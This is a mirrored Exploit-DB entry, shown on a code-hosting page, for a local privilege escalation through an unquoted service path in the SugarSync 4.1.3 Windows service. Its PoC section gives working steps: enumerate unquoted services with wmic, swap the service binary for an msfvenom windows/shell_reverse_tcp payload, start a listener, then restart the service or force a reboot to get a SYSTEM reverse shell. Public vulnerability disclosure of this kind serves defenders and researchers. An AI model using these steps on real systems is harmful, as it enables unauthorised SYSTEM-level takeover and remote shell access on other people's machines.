bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51106.txt
Exploit-DB 6bc7a6f9b0 DB: 2023-03-29 
25 changes to exploits/shellcodes/ghdb

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access

ZKTeco ZEM/ZMM 8.88 - Missing Authentication

Hashicorp Consul v1.0 - Remote Command Execution (RCE)

X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

OPSWAT Metadefender Core - Privilege Escalation

Pega Platform 8.1.0 - Remote Code Execution (RCE)

Beauty-salon v1.0 - Remote Code Execution (RCE)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

iBooking v1.0.8 - Arbitrary File Upload

Jetpack 11.4 - Cross Site Scripting (XSS)

Moodle LMS 4.0 - Cross-Site Scripting (XSS)

Online shopping system advanced 1.0 - Multiple Vulnerabilities

rukovoditel 3.2.1 - Cross-Site Scripting (XSS)

Senayan Library Management System v9.5.0 - SQL Injection

Social-Share-Buttons v2.2.3 - SQL Injection

Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)

YouPHPTube<= 7.8 - Multiple Vulnerabilities

Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)

SuperMailer v11.20 - Buffer overflow DoS

Tunnel Interface Driver - Denial of Service

VMware Workstation 15 Pro - Denial of Service

HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path

SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
2023-03-29 00:16:31 +00:00

66 lines
No EOL
3.2 KiB
Text
Raw Permalink Blame History

# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-20
# Vendor Homepage: https://www1.sugarsync.com
# Software Link: https://www1.sugarsync.com/apps/windows/
# Version : 4.1.3
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Description:
==============================
SugarSync installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "SugarSync Service" ]
4. The command would return..
C:\>sc qc "SugarSync Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SugarSync Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : SugarSync Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory.
8. Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory.
9. Start a listener.
9. Now restart the SugarSync service by giving coommand [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
Reference in a new issue View git blame Copy permalink